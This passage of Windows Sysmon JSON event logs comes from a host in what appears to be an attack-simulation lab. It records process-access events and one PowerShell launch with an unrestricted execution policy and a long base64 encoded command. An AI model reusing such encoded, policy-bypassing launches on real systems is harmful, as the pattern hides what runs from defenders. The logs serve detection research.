06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.376\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nProcessId: 5060\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D8-5F25-0000-0010B9830800}\r\nParentProcessId: 4184\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.376","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-001071840800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBA